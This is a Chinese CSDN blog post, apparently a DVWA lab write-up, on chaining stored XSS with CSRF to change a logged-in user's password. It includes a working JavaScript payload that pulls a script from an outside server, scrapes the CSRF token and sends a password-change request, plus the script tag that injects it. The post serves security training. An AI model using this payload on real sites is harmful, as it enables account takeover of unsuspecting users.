DVWA csrf高级

文章详细描述了一种利用存储型XSS漏洞结合CSRF(跨站请求伪造)来篡改用户密码的攻击方法。攻击者首先在网站的存储模块插入JS代码,当受害者浏览该页面时,其密码会被脚本自动修改。实验步骤包括:插入低级JS验证,寻找XSS注入点,准备并植入JS脚本,以及观察密码更改的结果。
摘要由CSDN通过智能技术生成

利用存储型xss达到csrf改密(跨站)

原理:利用网站的xss存储漏洞插入js代码,而js代码中有攻击者注入的连接脚本(改密),当用户登录浏览储存模块时,自己的密码都会被改成攻击者脚本中写的密码

环境准备:

受害者主机ip  192.168.11.59(虚拟机)

攻击者主机ip : 192.168.11.30(物理机)

测试网络连通性

 实验:

1、切换到低级:<script>alert(1)</script>

2、找到xss注入点,把js代码(<script>alert(1)</script>)丢进去有弹窗,就可以了

3、js脚本准备(我这是从云服务器导入的jequry包,以后不一定有用,可能需要自己准备jequry包,如果自己找不到可以私信我)

header("Access-Control-Allow-Origin:*");

var script=document.createElement("script");

script.type="text/javascript";

script.src="http://47.108.235.197:99/safe15/xss/jquery-3.4.1.min.js";

document.getElementsByTagName('head')[0].appendChild(script);


 

setTimeout(function() {

    $(document).ready(function(){

        var tokenUrl = 'http://192.168.11.59/dvwa/vulnerabilities/csrf/';

        $.get(tokenUrl, function (data) {

            var regex = /user_token\' value\=\'(.*?)\' \/\>/;

            var match = data.match(regex);

            var token = match[1];

            var changeUrl = 'http://192.168.11.59/dvwa/vulnerabilities/csrf/?user_token='+token+

                            '&password_new=1234&password_conf=1234&Change=Change';

            $.get(changeUrl, function (data) {

                alert('done');

            });

        });

    });

}, 500);

4把这个放进去

<script src='http://192.168.11.30/PHP/csrf.js'></script>

 

5切换到高级,看到弹窗(高级中有TOKEN )

 6弹出就自动跨站改掉密码了,退出登录 。再登录发现原来的密码登录不上了

 

7这时候用我们脚本中的密码登录

 

8、登录成功

 

 

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值